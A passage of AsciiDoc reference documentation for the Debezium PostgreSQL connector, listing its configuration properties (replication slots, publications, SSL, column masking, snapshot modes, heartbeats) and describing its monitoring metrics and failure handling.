configured for the connector when the connector stops. When the connector restarts, having the same replication slot enables the connector to start processing where it left off.\n\nSet to `true` in only testing or development environments. Dropping the slot allows the database to discard WAL segments. When the connector restarts it performs a new snapshot or it can continue from a persistent offset in the Kafka Connect offsets topic.\n\n|[[postgresql-property-publication-name]]<<postgresql-property-publication-name, `+publication.name+`>>\n|`dbz_publication`\n|The name of the PostgreSQL publication created for streaming changes when using `pgoutput`.\n\nThis publication is created at start-up if it does not already exist and it includes _all tables_.\n{prodname} then applies its own include\/exclude list filtering, if configured, to limit the publication to change events for the specific tables of interest.\nThe connector user must have superuser permissions to create this publication,\nso it is usually preferable to create the publication before starting the connector for the first time.\n\nIf the publication already exists, either for all tables or configured with a subset of tables, {prodname} uses the publication as it is defined.\n\n|[[postgresql-property-database-hostname]]<<postgresql-property-database-hostname, `+database.hostname+`>>\n|\n|IP address or hostname of the PostgreSQL database server.\n\n|[[postgresql-property-database-port]]<<postgresql-property-database-port, `+database.port+`>>\n|`5432`\n|Integer port number of the PostgreSQL database server.\n\n|[[postgresql-property-database-user]]<<postgresql-property-database-user, `+database.user+`>>\n|\n|Name of the PostgreSQL database user for connecting to the PostgreSQL database server.\n\n|[[postgresql-property-database-password]]<<postgresql-property-database-password, `+database.password+`>>\n|\n|Password to use when connecting to the PostgreSQL database server.\n\n|[[postgresql-property-database-dbname]]<<postgresql-property-database-dbname, `+database.dbname+`>>\n|\n|The name of the PostgreSQL database from which to stream the changes.\n\n|[[postgresql-property-database-server-name]]<<postgresql-property-database-server-name, `+database.server.name+`>>\n|\n|Logical name that identifies and provides a namespace for the particular PostgreSQL database server or cluster in which {prodname} is capturing changes. Only alphanumeric characters and underscores should be used in the database server logical name. The logical name should be unique across all other connectors, since it is used as a topic name prefix for all Kafka topics that receive records from this connector.\n\n|[[postgresql-property-schema-include-list]]<<postgresql-property-schema-include-list, `+schema.include.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match names of schemas for which you *want* to capture changes. Any schema name not included in `schema.include.list` is excluded from having its changes captured. By default, all non-system schemas have their changes captured. Do not also set the `schema.exclude.list` property.\n\n|[[postgresql-property-schema-exclude-list]]<<postgresql-property-schema-exclude-list, `+schema.exclude.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match names of schemas for which you *do not* want to capture changes. Any schema whose name is not included in `schema.exclude.list` has its changes captured, with the exception of system schemas. Do not also set the `schema.include.list` property.\n\n|[[postgresql-property-table-include-list]]<<postgresql-property-table-include-list, `+table.include.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you want to capture. Any table not included in `table.include.list` does not have its changes captured. Each identifier is of the form _schemaName_._tableName_. By default, the connector captures changes in every non-system table in each schema whose changes are being captured. Do not also set the `table.exclude.list` property.\n\n|[[postgresql-property-table-exclude-list]]<<postgresql-property-table-exclude-list, `+table.exclude.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you *do not* want to capture. Any table not included in `table.exclude.list` has it changes captured. Each identifier is of the form _schemaName_._tableName_. Do not also set the `table.include.list` property.\n\n|[[postgresql-property-column-include-list]]<<postgresql-property-column-include-list, `+column.include.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns that should be included in change event record values. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. Do not also set the `column.exclude.list` property.\n\n|[[postgresql-property-column-exclude-list]]<<postgresql-property-column-exclude-list, `+column.exclude.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns that should be excluded from change event record values. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. Do not also set the `column.include.list` property.\n\n|[[postgresql-property-time-precision-mode]]<<postgresql-property-time-precision-mode, `+time.precision.mode+`>>\n|`adaptive`\n|Time, date, and timestamps can be represented with different kinds of precision: +\n +\n`adaptive` captures the time and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type. +\n +\n`adaptive_time_microseconds` captures the date, datetime and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type. An exception is `TIME` type fields, which are always captured as microseconds. +\n +\n`connect` always represents time and timestamp values by using Kafka Connect's built-in representations for `Time`, `Date`, and `Timestamp`, which use millisecond precision regardless of the database columns' precision. See {link-prefix}:{link-postgresql-connector}#postgresql-temporal-values[temporal values].\n\n|[[postgresql-property-decimal-handling-mode]]<<postgresql-property-decimal-handling-mode, `+decimal.handling.mode+`>>\n|`precise`\n|Specifies how the connector should handle values for `DECIMAL` and `NUMERIC` columns: +\n +\n`precise` represents values by using `java.math.BigDecimal` to represent values in binary form in change events. +\n +\n`double` represents values by using `double` values, which might result in a loss of precision but which is easier to use. +\n +\n`string` encodes values as formatted strings, which are easy to consume but semantic information about the real type is lost. See {link-prefix}:{link-postgresql-connector}#postgresql-decimal-types[Decimal types].\n\n|[[postgresql-property-hstore-handling-mode]]<<postgresql-property-hstore-handling-mode, `+hstore.handling.mode+`>>\n|`map`\n| Specifies how the connector should handle values for `hstore` columns: +\n +\n`map` represents values by using `MAP`. +\n +\n`json` represents values by using `json string`. This setting encodes values as formatted strings such as `{\"key\" : \"val\"}`. See {link-prefix}:{link-postgresql-connector}#postgresql-hstore-type[PostgreSQL `HSTORE` type].\n\n|[[postgresql-property-interval-handling-mode]]<<postgresql-property-interval-handling-mode, `+interval.handling.mode+`>>\n|`numeric`\n| Specifies how the connector should handle values for `interval` columns: +\n +\n`numeric` represents intervals using approximate number of microseconds. +\n +\n`string` represents intervals exactly by using the string pattern representation `P<years>Y<months>M<days>DT<hours>H<minutes>M<seconds>S`. For example: `P1Y2M3DT4H5M6.78S`. See {link-prefix}:{link-postgresql-connector}#postgresql-basic-types[PostgreSQL basic types].\n\n|[[postgresql-property-database-sslmode]]<<postgresql-property-database-sslmode, `+database.sslmode+`>>\n|`disable`\n|Whether to use an encrypted connection to the PostgreSQL server. Options include: +\n +\n`disable` uses an unencrypted connection. +\n +\n`require` uses a secure (encrypted) connection, and fails if one cannot be established. +\n +\n`verify-ca` behaves like `require` but also verifies the server TLS certificate against the configured Certificate Authority (CA) certificates, or fails if no valid matching CA certificates are found. +\n +\n`verify-full` behaves like `verify-ca` but also verifies that the server certificate matches the host to which the connector is trying to connect. See link:https:\/\/www.postgresql.org\/docs\/current\/static\/libpq-connect.html[the PostgreSQL documentation] for more information.\n\n|[[postgresql-property-database-sslcert]]<<postgresql-property-database-sslcert, `+database.sslcert+`>>\n|\n|The path to the file that contains the SSL certificate for the client. See link:https:\/\/www.postgresql.org\/docs\/current\/static\/libpq-connect.html[the PostgreSQL documentation] for more information.\n\n|[[postgresql-property-database-sslkey]]<<postgresql-property-database-sslkey, `+database.sslkey+`>>\n|\n|The path to the file that contains the SSL private key of the client. See link:https:\/\/www.postgresql.org\/docs\/current\/static\/libpq-connect.html[the PostgreSQL documentation] for more information.\n\n|[[postgresql-property-database-sslpassword]]<<postgresql-property-database-sslpassword, `+database.sslpassword+`>>\n|\n|The password to access the client private key from the file specified by `database.sslkey`. See link:https:\/\/www.postgresql.org\/docs\/current\/static\/libpq-connect.html[the PostgreSQL documentation] for more information.\n\n|[[postgresql-property-database-sslrootcert]]<<postgresql-property-database-sslrootcert, `+database.sslrootcert+`>>\n|\n|The path to the file that contains the root certificate(s) against which the server is validated. See link:https:\/\/www.postgresql.org\/docs\/current\/static\/libpq-connect.html[the PostgreSQL documentation] for more information.\n\n|[[postgresql-property-database-tcpkeepalive]]<<postgresql-property-database-tcpkeepalive, `+database.tcpKeepAlive+`>>\n|`true`\n|Enable TCP keep-alive probe to verify that the database connection is still alive. See link:https:\/\/www.postgresql.org\/docs\/current\/static\/libpq-connect.html[the PostgreSQL documentation] for more information.\n\n|[[postgresql-property-tombstones-on-delete]]<<postgresql-property-tombstones-on-delete, `+tombstones.on.delete+`>>\n|`true`\n| Controls whether a tombstone event should be generated after a _delete_ event. +\n +\n`true` - delete operations are represented by a _delete_ event and a subsequent tombstone event. +\n +\n`false` - only a _delete_ event is sent. +\n +\nAfter a _delete_ operation, emitting a tombstone event enables Kafka to delete all change event records that have the same key as the deleted row.\n\n|[[postgresql-property-column-truncate-to-length-chars]]<<postgresql-property-column-truncate-to-length-chars, `+column.truncate.to._length_.chars+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. In change event records, values in these columns are truncated if they are longer than the number of characters specified by _length_ in the property name. You can specify multiple properties with different lengths in a single configuration. Length must be a positive integer, for example, `+column.truncate.to.20.chars`.\n\n|[[postgresql-property-column-mask-with-length-chars]]<<postgresql-property-column-mask-with-length-chars, `+column.mask.with._length_.chars+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. In change event values, the values in the specified table columns are replaced with _length_ number of asterisk (`*`) characters. You can specify multiple properties with different lengths in a single configuration. Length must be a positive integer or zero. When you specify zero, the connector replaces a value with an empty string.\n\n|[[postgresql-property-column-mask-hash]]<<postgresql-property-column-mask-hash, `+column.mask.hash._hashAlgorithm_.with.salt._salt_+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. In change event values, the values in the specified columns are replaced with pseudonyms. +\n +\nA pseudonym consists of the hashed value that results from applying the specifed _hashAlgorithm_ and _salt_. Based on the hash function that is used, referential integrity is kept while column values are replaced with pseudonyms. Supported hash functions are described in the {link-java7-standard-names}[MessageDigest section] of the Java Cryptography Architecture Standard Algorithm Name Documentation. +\n +\nIf necessary, the pseudonym is automatically shortened to the length of the column. You can specify multiple properties with different hash algorithms and salts in a single configuration. In the following example, `CzQMA0cB5K` is a randomly selected salt. +\n +\n`column.mask.hash.SHA-256.with.salt.CzQMA0cB5K =inventory.orders.customerName,inventory.shipment.customerName` +\n +\nDepending on the _hashAlgorithm_ used, the _salt_ selected, and the actual data set, the resulting masked data set might not be completely masked.\n\n|[[postgresql-property-column-propagate-source-type]]<<postgresql-property-column-propagate-source-type, `+column.propagate.source.type+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_, or _databaseName_._schemaName_._tableName_._columnName_. +\n +\nFor each specified column, the connector adds the column's original type and original length as parameters to the corresponding field schemas in the emitted change records. The following added schema parameters propagate the original type name and also the original length for variable-width types: +\n +\n`pass:[_]pass:[_]debezium.source.column.type` + `pass:[_]pass:[_]debezium.source.column.length` + `pass:[_]pass:[_]debezium.source.column.scale` +\n +\nThis property is useful for properly sizing corresponding columns in sink databases.\n\n|[[postgresql-property-datatype-propagate-source-type]]<<postgresql-property-datatype-propagate-source-type, `+datatype.propagate.source.type+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the database-specific data type name for some columns. Fully-qualified data type names are of the form _databaseName_._tableName_._typeName_, or _databaseName_._schemaName_._tableName_._typeName_. +\n +\nFor these data types, the connector adds parameters to the corresponding field schemas in emitted change records. The added parameters specify the original type and length of the column: +\n +\n`pass:[_]pass:[_]debezium.source.column.type` + `pass:[_]pass:[_]debezium.source.column.length` + `pass:[_]pass:[_]debezium.source.column.scale` +\n +\nThese parameters propagate a column's original type name and length, for variable-width types, respectively. This property is useful for properly sizing corresponding columns in sink databases. +\n +\nSee the {link-prefix}:{link-postgresql-connector}#postgresql-data-types[list of PostgreSQL-specific data type names].\n\n|[[postgresql-property-message-key-columns]]<<postgresql-property-message-key-columns, `+message.key.columns+`>>\n|_empty string_\n|A semicolon separated list of tables with regular expressions that match table column names. The connector maps values in matching columns to key fields in change event records that it sends to Kafka topics. This is useful when a table does not have a primary key, or when you want to order change event records in a Kafka topic according to a field that is not a primary key. +\n +\nSeparate entries with semicolons. Insert a colon between the fully-qualified table name and its regular expression. The format is: +\n +\n_schema-name_._table-name_:_regexp_;... +\n +\nFor example, +\n +\n`schemaA.table_a:regex_1;schemaB.table_b:regex_2;schemaC.table_c:regex_3` +\n +\nIf `table_a` has a an `id` column, and `regex_1` is `^i` (matches any column that starts with `i`), the connector maps the value in ``table_a``'s `id` column to a key field in change events that the connector sends to Kafka.\n\n|[[postgresql-publication-autocreate-mode]]<<postgresql-publication-autocreate-mode, `+publication.autocreate.mode+`>>\n|_all_tables_\n|Applies only when streaming changes by using link:https:\/\/www.postgresql.org\/docs\/current\/sql-createpublication.html[the `pgoutput` plug-in]. The setting determines how creation of a link:https:\/\/www.postgresql.org\/docs\/current\/logical-replication-publication.html[publication] should work. Possible settings are: +\n +\n`all_tables` - If a publication exists, the connector uses it. If a publication does not exist, the connector creates a publication for all tables in the database for which the connector is capturing changes. This requires that the database user that has permission to perform replications also has permission to create a publication. This is granted with `CREATE PUBLICATION <publication_name> FOR ALL TABLES;`. +\n +\n`disabled` - The connector does not attempt to create a publication. A database administrator or the user configured to perform replications must have created the publication before running the connector. If the connector cannot find the publication, the connector throws an exception and stops. +\n +\n`filtered` - If a publication exists, the connector uses it. If no publication exists, the connector creates a new publication for tables that match the current filter configuration as specified by the `database.exclude.list`, `schema.include.list`, `schema.exclude.list`, and `table.include.list` connector configuration properties. For example: `CREATE PUBLICATION <publication_name> FOR TABLE <tbl1, tbl2, tbl3>`.\n\n|[[postgresql-property-binary-handling-mode]]<<postgresql-property-binary-handling-mode, `+binary.handling.mode+`>>\n|bytes\n|Specifies how binary (`bytea`) columns should be represented in change events: +\n +\n`bytes` represents binary data as byte array. +\n +\n`base64` represents binary data as base64-encoded strings. +\n +\n`hex` represents binary data as hex-encoded (base16) strings.\n\n|[[postgresql-property-truncate-handling-mode]]<<postgresql-property-truncate-handling-mode, `+truncate.handling.mode+`>>\n|bytes\n|Specifies how whether `TRUNCATE` events should be propagated or not (only available when using the `pgoutput` plug-in with Postgres 11 or later): +\n +\n`skip` causes those event to be omitted (the default). +\n +\n`include` causes hos events to be included. +\n+\nPlease see xref:postgresql-truncate-events[] for the structure of _truncate_ events and their ordering semantics.\n\n|===\n\n[id=\"postgresql-advanced-configuration-properties\"]\nThe following _advanced_ configuration properties have defaults that work in most situations and therefore rarely need to be specified in the connector's configuration.\n\n.Advanced connector configuration properties\n[cols=\"30%a,28%a,42%a\",options=\"header\"]\n|===\n|Property\n|Default\n|Description\n\n|[[postgresql-property-snapshot-mode]]<<postgresql-property-snapshot-mode, `+snapshot.mode+`>>\n|`initial`\n|Specifies the criteria for performing a snapshot when the connector starts: +\n +\n`initial` - The connector performs a snapshot only when no offsets have been recorded for the logical server name. +\n +\n`always` - The connector performs a snapshot each time the connector starts. +\n +\n`never` - The connector never performs snapshots. When a connector is configured this way, its behavior when it starts is as follows. If there is a previously stored LSN in the Kafka offsets topic, the connector continues streaming changes from that position. If no LSN has been stored, the connector starts streaming changes from the point in time when the PostgreSQL logical replication slot was created on the server. The `never` snapshot mode is useful only when you know all data of interest is still reflected in the WAL. +\n +\n`initial_only` - The connector performs an initial snapshot and then stops, without processing any subsequent changes. +\n +\n`exported` - The connector performs a snapshot based on the point in time when the replication slot was created. This is an excellent way to perform the snapshot in a lock-free way. +\n +\nifdef::community[]\n`custom` - The connector performs a snapshot according to the setting for the `snapshot.custom.class` property, which is a custom implementation of the `io.debezium.connector.postgresql.spi.Snapshotter` interface. +\nendif::community[]\n +\nThe{link-prefix}:{link-postgresql-connector}#snapshot-mode-settings[reference table for snapshot mode settings] has more details.\n\nifdef::community[]\n|[[postgresql-property-snapshot-custom-class]]<<postgresql-property-snapshot-custom-class, `+snapshot.custom.class+`>>\n|\n| A full Java class name that is an implementation of the `io.debezium.connector.postgresql.spi.Snapshotter` interface. Required when the `snapshot.mode` property is set to `custom`. See {link-prefix}:{link-postgresql-connector}#postgresql-custom-snapshot[custom snapshotter SPI].\nendif::community[]\n|[[postgresql-property-snapshot-include-collection-list]]<<postgresql-property-snapshot-include-collection-list, `+snapshot.include.collection.list+`>>\n| All tables specified in `table.include.list`\n|An optional, comma-separated list of regular expressions that match names of schemas specified in `table.include.list` for which you *want* to take the snapshot when the `snapshot.mode` is not `never`\n|[[postgresql-property-snapshot-lock-timeout-ms]]<<postgresql-property-snapshot-lock-timeout-ms, `+snapshot.lock.timeout.ms+`>>\n|`10000`\n|Positive integer value that specifies the maximum amount of time (in milliseconds) to wait to obtain table locks when performing a snapshot. If the connector cannot acquire table locks in this time interval, the snapshot fails. {link-prefix}:{link-postgresql-connector}#postgresql-snapshots[How the connector performs snapshots] provides details.\n\n|[[postgresql-property-snapshot-select-statement-overrides]]<<postgresql-property-snapshot-select-statement-overrides, `+snapshot.select.statement.overrides+`>>\n|\n|Controls which table rows are included in snapshots. This property affects snapshots only. It does not affect events that are generated by the logical decoding plug-in. Specify a comma-separated list of fully-qualified table names in the form _databaseName.tableName_. +\n +\nFor each table that you specify, also specify another configuration property: `snapshot.select.statement.overrides._DB_NAME_._TABLE_NAME_`, for example: `snapshot.select.statement.overrides.customers.orders`. Set this property to a `SELECT` statement that obtains only the rows that you want in the snapshot. When the connector performs a snapshot, it executes this `SELECT` statement to retrieve data from that table. +\n +\nA possible use case for setting these properties is large, append-only tables. You can specify a `SELECT` statement that sets a specific point for where to start a snapshot, or where to resume a snapshot if a previous snapshot was interrupted.\n\n|[[postgresql-property-event-processing-failure-handling-mode]]<<postgresql-property-event-processing-failure-handling-mode, `+event.processing.failure.handling.mode+`>>\n|`fail`\n| Specifies how the connector should react to exceptions during processing of events: +\n +\n`fail` propagates the exception, indicates the offset of the problematic event, and causes the connector to stop. +\n +\n`warn` logs the offset of the problematic event, skips that event, and continues processing. +\n +\n`skip` skips the problematic event and continues processing.\n\n|[[postgresql-property-max-queue-size]]<<postgresql-property-max-queue-size, `+max.queue.size+`>>\n|`20240`\n|Positive integer value for the maximum size of the blocking queue. The connector places change events received from streaming replication in the blocking queue before writing them to Kafka. This queue can provide backpressure when, for example, writing records to Kafka is slower that it should be or Kafka is not available.\n\n|[[postgresql-property-max-batch-size]]<<postgresql-property-max-batch-size, `+max.batch.size+`>>\n|`10240`\n|Positive integer value that specifies the maximum size of each batch of events that the connector processes.\n\n|[[postgresql-property-max-queue-size-in-bytes]]<<postgresql-property-max-queue-size-in-bytes, `+max.queue.size.in.bytes+`>>\n|`0`\n|Long value for the maximum size in bytes of the blocking queue. The feature is disabled by default, it will be active if it's set with a positive long value.\n\n|[[postgresql-property-poll-interval-ms]]<<postgresql-property-poll-interval-ms, `+poll.interval.ms+`>>\n|`1000`\n|Positive integer value that specifies the number of milliseconds the connector should wait for new change events to appear before it starts processing a batch of events. Defaults to 1000 milliseconds, or 1 second.\n\n|[[postgresql-property-include-unknown-datatypes]]<<postgresql-property-include-unknown-datatypes, `+include.unknown.datatypes+`>>\n|`false`\n|Specifies connector behavior when the connector encounters a field whose data type is unknown. The default behavior is that the connector omits the field from the change event and logs a warning. +\n +\nSet this property to `true` if you want the change event to contain an opaque binary representation of the field. This lets consumers decode the field. You can control the exact representation by setting the {link-prefix}:{link-postgresql-connector}#postgresql-property-binary-handling-mode[`binary handling mode`] property.\n\nNOTE: Consumers risk backward compatibility issues when `include.unknown.datatypes` is set to `true`. Not only may the database-specific binary representation change between releases, but if the data type is eventually supported by {prodname}, the data type will be sent downstream in a logical type, which would require adjustments by consumers. In general, when encountering unsupported data types, create a feature request so that support can be added.\n\n|[[postgresql-property-database-initial-statements]]<<postgresql-property-database-initial-statements, `+database.initial.statements+`>>\n|\n|A semicolon separated list of SQL statements that the connector executes when it establishes a JDBC connection to the database. To use a semicolon as a character and not as a delimiter, specify two consecutive semicolons, `;;`. +\n +\nThe connector may establish JDBC connections at its own discretion. Consequently, this property is useful for configuration of session parameters only, and not for executing DML statements. +\n +\nThe connector does not execute these statements when it creates a connection for reading the transaction log. +\n\n|[[postgresql-property-heartbeat-interval-ms]]<<postgresql-property-heartbeat-interval-ms, `+heartbeat.interval.ms+`>>\n|`0`\n|Controls how frequently the connector sends heartbeat messages to a Kafka topic. The default behavior is that the connector does not send heartbeat messages. +\n +\nHeartbeat messages are useful for monitoring whether the connector is receiving change events from the database. Heartbeat messages might help decrease the number of change events that need to be re-sent when a connector restarts. To send heartbeat messages, set this property to a positive integer, which indicates the number of milliseconds between heartbeat messages. +\n +\nHeartbeat messages are needed when there are many updates in a database that is being tracked but only a tiny number of updates are related to the table(s) and schema(s) for which the connector is capturing changes. In this situation, the connector reads from the database transaction log as usual but rarely emits change records to Kafka. This means that no offset updates are committed to Kafka and the connector does not have an opportunity to send the latest retrieved LSN to the database. The database retains WAL files that contain events that have already been processed by the connector. Sending heartbeat messages enables the connector to send the latest retrieved LSN to the database, which allows the database to reclaim disk space being used by no longer needed WAL files.\n\n|[[postgresql-property-heartbeat-topics-prefix]]<<postgresql-property-heartbeat-topics-prefix, `+heartbeat.topics.prefix+`>>\n|`__debezium-heartbeat`\n|Controls the name of the topic to which the connector sends heartbeat messages. The topic name has this pattern: +\n +\n_<heartbeat.topics.prefix>_._<server.name>_ +\n +\nFor example, if the database server name is `fulfillment`, the default topic name is `__debezium-heartbeat.fulfillment`.\n\n|[[postgresql-property-heartbeat-action-query]]<<postgresql-property-heartbeat-action-query, `+heartbeat.action.query+`>>\n|\n|Specifies a query that the connector executes on the source database when the connector sends a heartbeat message. +\n +\nThis is useful for resolving the situation described in {link-prefix}:{link-postgresql-connector}#postgresql-wal-disk-space[WAL disk space consumption], where capturing changes from a low-traffic database on the same host as a high-traffic database prevents {prodname} from processing WAL records and thus acknowledging WAL positions with the database. To address this situation, create a heartbeat table in the low-traffic database, and set this property to a statement that inserts records into that table, for example: +\n +\n`INSERT INTO test_heartbeat_table (text) VALUES ('test_heartbeat')` +\n +\nThis allows the connector to receive changes from the low-traffic database and acknowledge their LSNs, which prevents unbounded WAL growth on the database host.\n\n|[[postgresql-property-schema-refresh-mode]]<<postgresql-property-schema-refresh-mode, `+schema.refresh.mode+`>>\n|`columns_diff`\n|Specify the conditions that trigger a refresh of the in-memory schema for a table. +\n +\n`columns_diff` is the safest mode. It ensures that the in-memory schema stays in sync with the database table's schema at all times. +\n +\n`columns_diff_exclude_unchanged_toast` instructs the connector to refresh the in-memory schema cache if there is a discrepancy with the schema derived from the incoming message, unless unchanged TOASTable data fully accounts for the discrepancy. +\n +\nThis setting can significantly improve connector performance if there are frequently-updated tables that have TOASTed data that are rarely part of updates. However, it is possible for the in-memory schema to\nbecome outdated if TOASTable columns are dropped from the table.\n\n|[[postgresql-property-snapshot-delay-ms]]<<postgresql-property-snapshot-delay-ms, `+snapshot.delay.ms+`>>\n|\n|An interval in milliseconds that the connector should wait before performing a snapshot when the connector starts. If you are starting multiple connectors in a cluster, this property is useful for avoiding snapshot interruptions, which might cause re-balancing of connectors.\n\n|[[postgresql-property-snapshot-fetch-size]]<<postgresql-property-snapshot-fetch-size, `+snapshot.fetch.size+`>>\n|`10240`\n|During a snapshot, the connector reads table content in batches of rows. This property specifies the maximum number of rows in a batch.\n\n|[[postgresql-property-slot-stream-params]]<<postgresql-property-slot-stream-params, `+slot.stream.params+`>>\n|\n|Semicolon separated list of parameters to pass to the configured logical decoding plug-in. For example, `add-tables=public.table,public.table2;include-lsn=true`.\n\nifdef::community[]\nIf you are using the `wal2json` plug-in, this property is useful for enabling server-side table filtering. Allowed values depend on the configured plug-in.\nendif::community[]\n\n|[[postgresql-property-sanitize-field-names]]<<postgresql-property-sanitize-field-names, `+sanitize.field.names+`>>\n|`true` if connector configuration sets the `key.converter` or `value.converter` property to the Avro converter.\n\n`false` if not.\n|Indicates whether field names are sanitized to adhere to {link-prefix}:{link-avro-serialization}#avro-naming[Avro naming requirements].\n\n|[[postgresql-property-slot-max-retries]]<<postgresql-property-slot-max-retries, `+slot.max.retries+`>>\n|`6`\n|If connecting to a replication slot fails, this is the maximum number of consecutive attempts to connect.\n\n|[[postgresql-property-slot-retry-delay-ms]]<<postgresql-property-slot-retry-delay-ms, `+slot.retry.delay.ms+`>> +\n|`10000` (10 seconds)\n|The number of milliseconds to wait between retry attempts when the connector fails to connect to a replication slot.\n\n|[[postgresql-property-toasted-value-placeholder]]<<postgresql-property-toasted-value-placeholder, `+toasted.value.placeholder+`>>\n|`__debezium_unavailable_value`\n|Specifies the constant that the connector provides to indicate that the original value is a toasted value that is not provided by the database.\nIf the setting of `toasted.value.placeholder` starts with the `hex:` prefix it is expected that the rest of the string represents hexadecimally encoded octets. See {link-prefix}:{link-postgresql-connector}#postgresql-toasted-values[toasted values] for additional details.\n\n|[[postgresql-property-provide-transaction-metadata]]<<postgresql-property-provide-transaction-metadata, `+provide.transaction.metadata+`>>\n|`false`\n|Determines whether the connector generates events with transaction boundaries and enriches change event envelopes with transaction metadata. Specify `true` if you want the connector to do this. See {link-prefix}:{link-postgresql-connector}#postgresql-transaction-metadata[Transaction metadata] for details.\n\n|[[postgresql-property-retriable-restart-connector-wait-ms]]<<postgresql-property-retriable-restart-connector-wait-ms, `+retriable.restart.connector.wait.ms+`>> +\n|10000 (10 seconds)\n|The number of milliseconds to wait before restarting a connector after a retriable error occurs.\n\n|===\n\n[id=\"postgresql-pass-through-properties\"]\n.Pass-through connector configuration properties\nThe connector also supports _pass-through_ configuration properties that are used when creating the Kafka producer and consumer.\n\nBe sure to consult the {link-kafka-docs}.html[Kafka documentation] for all of the configuration properties for Kafka producers and consumers. The PostgreSQL connector does use the {link-kafka-docs}.html#consumerconfigs[new consumer configuration properties].\n\n\n\/\/ Type: assembly\n\/\/ ModuleID: monitoring-debezium-postgresql-connector-performance\n\/\/ Title: Monitoring {prodname} PostgreSQL connector performance\n[[postgresql-monitoring]]\n== Monitoring\n\nThe {prodname} PostgreSQL connector provides two types of metrics that are in addition to the built-in support for JMX metrics that Zookeeper, Kafka, and Kafka Connect provide.\n\n* {link-prefix}:{link-postgresql-connector}#postgresql-snapshot-metrics[Snapshot metrics] provide information about connector operation while performing a snapshot.\n* {link-prefix}:{link-postgresql-connector}#postgresql-streaming-metrics[Streaming metrics] provide information about connector operation when the connector is capturing changes and streaming change event records.\n\n{link-prefix}:{link-debezium-monitoring}#monitoring-debezium[{prodname} monitoring documentation] provides details for how to expose these metrics by using JMX.\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-during-snapshots-of-postgresql-databases\n\/\/ Title: Monitoring {prodname} during snapshots of PostgreSQL databases\n[[postgresql-snapshot-metrics]]\n=== Snapshot metrics\n\nThe *MBean* is `debezium.postgres:type=connector-metrics,context=snapshot,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-snapshot-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-postgresql-connector-record-streaming\n\/\/ Title: Monitoring {prodname} PostgreSQL connector record streaming\n[[postgresql-streaming-metrics]]\n=== Streaming metrics\n\nThe *MBean* is `debezium.postgres:type=connector-metrics,context=streaming,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-streaming-metrics.adoc[leveloffset=+1]\n\n\n\n\/\/ Type: reference\n\/\/ ModuleID: how-debezium-postgresql-connectors-handle-faults-and-problems\n\/\/ Title: How {prodname} PostgreSQL connectors handle faults and problems\n[[postgresql-when-things-go-wrong]]\n== Behavior when things go wrong\n\n{prodname} is a distributed system that captures all changes in multiple upstream databases; it never misses or loses an event. When the system is operating normally or being managed carefully then {prodname} provides _exactly once_ delivery of every change event record.\n\nIf a fault does happen then the system does not lose any events. However, while it is recovering from the fault, it might repeat some change events. In these abnormal situations, {prodname}, like Kafka, provides _at least once_ delivery of change events.\n\nifdef::community[]\nThe rest of this section describes how {prodname} handles various kinds of faults and problems.\nendif::community[]\n\nifdef::product[]\nDetails are in the following sections:\n\n* xref:postgresql-connector-configuration-and-startup-errors[]\n* xref:postgresql-becomes-unavailable[]\n* xref:postgresql-cluster-failures[]\n* xref:postgresql-kafka-connect-process-stops-gracefully[]\n* xref:postgresql-kafka-connect-process-crashes[]\n* xref:postgresql-kafka-becomes-unavailable[]\n* xref:postgresql-connector-is-stopped-for-a-duration[]\nendif::product[]\n\n[id=\"postgresql-connector-configuration-and-startup-errors\"]\n=== Configuration and startup errors\n\nIn the following situations, the connector fails when trying to start, reports an error\/exception in the log, and stops running:\n\n* The connector's configuration is invalid.\n* The connector cannot successfully connect to PostgreSQL by using the specified connection parameters.\n* The connector is restarting from a previously-recorded position in the PostgreSQL WAL (by using the LSN) and PostgreSQL no longer has that history available.\n\nIn these cases, the error message has details about the problem and possibly a suggested workaround. After you correct the configuration or address the PostgreSQL problem, restart the connector.\n\n[id=\"postgresql-becomes-unavailable\"]\n=== PostgreSQL becomes unavailable\n\nWhen the connector is running, the PostgreSQL server that it is connected to could become unavailable for any number of reasons. If this happens, the connector fails with an error and stops. When the server is available again, restart the connector.\n\nThe PostgreSQL connector externally stores the last processed offset in the form of a PostgreSQL LSN. After a connector restarts and connects to a server instance, the connector communicates with the server to continue streaming from that particular offset. This offset is available as long as the {prodname} replication slot remains intact. Never drop a replication slot on the primary server or you will lose data. See the next section for failure cases in which a slot has been removed.\n\n[id=\"postgresql-cluster-failures\"]\n=== Cluster failures\n\nAs of release 12, PostgreSQL allows logical replication slots _only on primary servers_. This means that you can point a {prodname} PostgreSQL connector to only the active primary server of a database cluster.\nAlso, replication slots themselves are not propagated to replicas.\nIf the primary server goes down, a new primary must be promoted.\n\nifdef::community[]\nThe new primary must have the {link-prefix}:{link-postgresql-connector}#installing-postgresql-output-plugin[logical decoding plug-in] installed and a replication slot that is configured for use by the plug-in and the database for which you want to capture changes. Only then can you point the connector to the new server and restart the 